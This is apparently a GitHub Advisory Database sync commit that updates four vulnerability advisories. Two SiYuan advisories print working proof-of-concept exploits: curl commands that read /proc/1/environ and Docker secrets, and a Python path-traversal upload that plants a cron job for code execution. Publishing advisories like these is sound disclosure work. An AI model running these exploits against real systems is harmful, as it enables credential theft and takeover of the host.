Advisory Database Sync

Author: advisory-database[bot]

advisories/github-reviewed/2024/11/GHSA-99w6-3xph-cx78/GHSA-99w6-3xph-cx78.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-99w6-3xph-cx78",
-  "modified": "2024-12-18T06:30:48Z",
+  "modified": "2026-03-19T18:30:43Z",
   "published": "2024-11-12T00:30:36Z",
   "aliases": [
     "CVE-2024-11079"
@@ -125,6 +125,10 @@
     {
       "type": "WEB",
       "url": "https://github.com/ansible/ansible/blob/v2.18.1/changelogs/CHANGELOG-v2.18.rst#security-fixes"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.debian.org/debian-lts-announce/2026/03/msg00006.html"
     }
   ],
   "database_specific": {

advisories/github-reviewed/2026/03/GHSA-h27x-g6w4-24gq/GHSA-h27x-g6w4-24gq.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-h27x-g6w4-24gq",
-  "modified": "2026-03-17T16:16:49Z",
+  "modified": "2026-03-19T18:31:02Z",
   "published": "2026-03-17T16:16:49Z",
   "aliases": [
     "CVE-2026-27979"
@@ -40,6 +40,10 @@
       "type": "WEB",
       "url": "https://github.com/vercel/next.js/security/advisories/GHSA-h27x-g6w4-24gq"
     },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27979"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/vercel/next.js/commit/c885d4825f800dd1e49ead37274dcd08cdd6f3f1"
@@ -60,6 +64,6 @@
     "severity": "MODERATE",
     "github_reviewed": true,
     "github_reviewed_at": "2026-03-17T16:16:49Z",
-    "nvd_published_at": null
+    "nvd_published_at": "2026-03-18T01:16:04Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-h5vh-m7fg-w5h6/GHSA-h5vh-m7fg-w5h6.json

@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-h5vh-m7fg-w5h6",
-  "modified": "2026-03-16T18:46:14Z",
+  "modified": "2026-03-19T18:30:09Z",
   "published": "2026-03-16T18:46:14Z",
   "aliases": [
     "CVE-2026-32747"
   ],
   "summary": "SiYuan globalCopyFiles: incomplete sensitive path blocklist allows reading /proc and Docker secrets",
-  "details": "### Summary\n`POST /api/file/globalCopyFiles` reads source files using `filepath.Abs()` with no workspace boundary check, relying solely on `util.IsSensitivePath()` whose blocklist omits `/proc/`, `/run/secrets/`, and home directory dotfiles. An admin can copy `/proc/1/environ` or Docker secrets into the workspace and read them via the standard file API.\n\n### Details\n**File:** `kernel/api/file.go` - function `globalCopyFiles`\n\n```go\nfor i, src := range srcs {\n    absSrc, _ := filepath.Abs(src)   //  not restricted to workspace\n\n    if util.IsSensitivePath(absSrc) { //  blocklist is incomplete\n        return\n    }\n    srcs[i] = absSrc\n}\ndestDir := filepath.Join(util.WorkspaceDir, destDir)\nfor _, src := range srcs {\n    dest := filepath.Join(destDir, filepath.Base(src))\n    filelock.Copy(src, dest)   // copies unchecked sensitive file into workspace\n}\n```\n\n**`IsSensitivePath` blocklist** (`kernel/util/path.go`):\n```go\nprefixes := []string{\"/etc/ssh\", \"/root\", \"/etc\", \"/var/lib/\", \"/.\"}\n```\n\n**Not blocked - exploitable targets:**\n| Path | Contains |\n|------|----------|\n| `/proc/1/environ` | All env vars: `DATABASE_URL`, `AWS_ACCESS_KEY_ID`, `ANTHROPIC_API_KEY` |\n| `/run/secrets/*` | Docker Swarm / Compose injected secrets |\n| `/home/siyuan/.aws/credentials` | AWS credentials (non-root user) |\n| `/home/siyuan/.ssh/id_rsa` | SSH private key (non-root user) |\n| `/tmp/` | Temporary files including tokens |\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\n# Step 1: Copy /proc/1/environ (process env vars) into workspace assets\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"srcs\":[\"/proc/1/environ\"],\"destDir\":\"data/assets/\"}'\n\n# Step 2: Read the copied file via standard API\ncurl -s -X POST http://localhost:6806/api/file/getFile \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"path\":\"/data/assets/environ\"}' | tr '\\0' '\\n'\n\n# Output: HOSTNAME=abc\\nPATH=/usr/local/sbin:...\\nDATABASE_URL=postgres://...\\nAPI_KEY=sk-...\n```\n\n**Docker secrets:**\n```bash\n# Copy all Docker-injected secrets\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"srcs\":[\"/run/secrets/db_password\",\"/run/secrets/api_token\"],\"destDir\":\"data/assets/\"}'\n```\n\n### Impact\nAn admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.",
+  "details": "### Summary\nPOST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.\n\n### Details\nFile: kernel/api/file.go - function globalCopyFiles\n\n```go\nfor i, src := range srcs {\n    absSrc, _ := filepath.Abs(src)\n\n    if util.IsSensitivePath(absSrc) {\n        return\n    }\n    srcs[i] = absSrc\n}\ndestDir := filepath.Join(util.WorkspaceDir, destDir)\nfor _, src := range srcs {\n    dest := filepath.Join(destDir, filepath.Base(src))\n    filelock.Copy(src, dest)   // copies unchecked sensitive file into workspace\n}\n```\n\nIsSensitivePath blocklist (kernel/util/path.go):\n```go\nprefixes := []string{\"/etc/ssh\", \"/root\", \"/etc\", \"/var/lib/\", \"/.\"}\n```\n\n**Not blocked - exploitable targets:**\n| Path | Contains |\n|------|----------|\n| /proc/1/environ | All env vars: DATABASE_URL, AWS_ACCESS_KEY_ID, ANTHROPIC_API_KEY |\n| /run/secrets/* | Docker Swarm / Compose injected secrets |\n| /home/siyuan/.aws/credentials | AWS credentials (non-root user) |\n| /home/siyuan/.ssh/id_rsa | SSH private key (non-root user) |\n| /tmp/ | Temporary files including tokens |\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"srcs\":[\"/proc/1/environ\"],\"destDir\":\"data/assets/\"}'\n\ncurl -s -X POST http://localhost:6806/api/file/getFile \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"path\":\"/data/assets/environ\"}' | tr '\\0' '\\n'\n```\n\n**Docker secrets:**\n```bash\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"srcs\":[\"/run/secrets/db_password\",\"/run/secrets/api_token\"],\"destDir\":\"data/assets/\"}'\n```\n\n### Impact\nAn admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.",
   "severity": [
     {
       "type": "CVSS_V3",

advisories/github-reviewed/2026/03/GHSA-qvvf-q994-x79v/GHSA-qvvf-q994-x79v.json

@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-qvvf-q994-x79v",
-  "modified": "2026-03-16T18:47:02Z",
+  "modified": "2026-03-19T18:29:56Z",
   "published": "2026-03-16T18:47:02Z",
   "aliases": [
     "CVE-2026-32749"
   ],
   "summary": "SiYuan importSY/importZipMd: path traversal via multipart filename enables arbitrary file write",
-  "details": "### Summary\n`POST /api/import/importSY` and `POST /api/import/importZipMd` write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory — including system paths that enable RCE.\n\n### Details\n**File:** `kernel/api/import.go` — functions `importSY` and `importZipMd`\n\n```go\nfile := files[0]\n\n// ❌ file.Filename comes from the HTTP multipart header — fully user-controlled\nwritePath := filepath.Join(util.TempDir, \"import\", file.Filename)\n// e.g. TempDir=/siyuan/workspace/temp, file.Filename=\"../../data/evil\"\n// → writePath = /siyuan/workspace/data/evil  (escapes temp/import/)\n\nwriter, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)\n```\n\n`importZipMd` has a second traversal in `unzipPath` construction:\n```go\nfilenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))\nunzipPath    := filepath.Join(util.TempDir, \"import\", filenameMain)\ngulu.Zip.Unzip(writePath, unzipPath)   // unzipPath also escapes TempDir\n```\n\n`filepath.Join` calls `filepath.Clean` internally, but cleaning happens **after** concatenation — sufficient `../` sequences escape the base directory entirely. The `curl` tool sanitizes `../` in multipart filenames, so exploitation requires sending the raw HTTP request via Python `requests` or a custom client.\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```python\nimport requests, zipfile, io\n\nHOST  = \"http://localhost:6806\"\nTOKEN = \"YOUR_ADMIN_TOKEN\"  # from Settings → About → API Token\n\n# Create a valid .sy.zip payload\nbuf = io.BytesIO()\nwith zipfile.ZipFile(buf, 'w') as z:\n    z.writestr(\"TestNB/20240101000000-abcdefg.sy\",\n        '{\"ID\":\"20240101000000-abcdefg\",\"Spec\":\"1\",\"Type\":\"NodeDocument\",\"Children\":[]}')\n    z.writestr(\"TestNB/.siyuan/sort.json\", \"{}\")\nbuf.seek(0)\n\n# Traversal filename — Python requests does NOT sanitize ../\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../data/TRAVERSAL_PROOF.zip\", buf.read(), \"application/zip\")},\n    data={\"notebook\": \"YOUR_NOTEBOOK_ID\", \"toPath\": \"/\"})\n\nprint(r.text)\n# Returns: {\"code\":0,\"msg\":\"\",\"data\":null}\n# File was written to /siyuan/workspace/data/TRAVERSAL_PROOF.zip\n```\n\n**RCE via cron (root container):**\n```python\ncron = b\"* * * * * root touch /tmp/RCE_CONFIRMED\\n\"\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../../../../etc/cron.d/siyuan_poc\", cron, \"application/zip\")},\n    data={\"notebook\": \"NOTEBOOK_ID\", \"toPath\": \"/\"})\n# cron executes on next minute → /tmp/RCE_CONFIRMED appears\n```\n\n**Confirmed response on v3.6.0:** `{\"code\":0,\"msg\":\"\",\"data\":null}`\n\n### Impact\nAn admin can write arbitrary content to any path writable by the SiYuan process:\n- **RCE** via `/etc/cron.d/` (root containers), `~/.bashrc`, SSH `authorized_keys`\n- **Data destruction** by overwriting workspace or application files\n- In Docker containers running as root (common default), this grants **full container compromise**",
+  "details": "### Summary\nPOST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE.\n\n### Details\nFile: kernel/api/import.go - functions importSY and importZipMd\n\n```go\nfile := files[0]\nwritePath := filepath.Join(util.TempDir, \"import\", file.Filename)\nwriter, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)\n```\n\nimportZipMd has a second traversal in unzipPath construction:\n```go\nfilenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))\nunzipPath    := filepath.Join(util.TempDir, \"import\", filenameMain)\ngulu.Zip.Unzip(writePath, unzipPath)\n```\n\nfilepath.Join calls filepath.Clean internally, but cleaning happens after concatenation - sufficient ../ sequences escape the base directory entirely. The curl tool sanitizes ../ in multipart filenames, so exploitation requires sending the raw HTTP request via Python requests or a custom client.\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```python\nimport requests, zipfile, io\n\nHOST  = \"http://localhost:6806\"\nTOKEN = \"YOUR_ADMIN_TOKEN\"\n\nbuf = io.BytesIO()\nwith zipfile.ZipFile(buf, 'w') as z:\n    z.writestr(\"TestNB/20240101000000-abcdefg.sy\",\n        '{\"ID\":\"20240101000000-abcdefg\",\"Spec\":\"1\",\"Type\":\"NodeDocument\",\"Children\":[]}')\n    z.writestr(\"TestNB/.siyuan/sort.json\", \"{}\")\nbuf.seek(0)\n\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../data/TRAVERSAL_PROOF.zip\", buf.read(), \"application/zip\")},\n    data={\"notebook\": \"YOUR_NOTEBOOK_ID\", \"toPath\": \"/\"})\n\nprint(r.text)\n```\n\n**RCE via cron (root container):**\n```python\ncron = b\"* * * * * root touch /tmp/RCE_CONFIRMED\\n\"\nr = requests.post(f\"{HOST}/api/import/importSY\",\n    headers={\"Authorization\": f\"Token {TOKEN}\"},\n    files={\"file\": (\"../../../../../etc/cron.d/siyuan_poc\", cron, \"application/zip\")},\n    data={\"notebook\": \"NOTEBOOK_ID\", \"toPath\": \"/\"})\n```\n\n**Confirmed response on v3.6.0:** {\"code\":0,\"msg\":\"\",\"data\":null}\n\n### Impact\nAn admin can write arbitrary content to any path writable by the SiYuan process:\n- RCE via /etc/cron.d/ (root containers), ~/.bashrc, SSH authorized_keys\n- Data destruction by overwriting workspace or application files\n- In Docker containers running as root (common default), this grants full container compromise",
   "severity": [
     {
       "type": "CVSS_V3",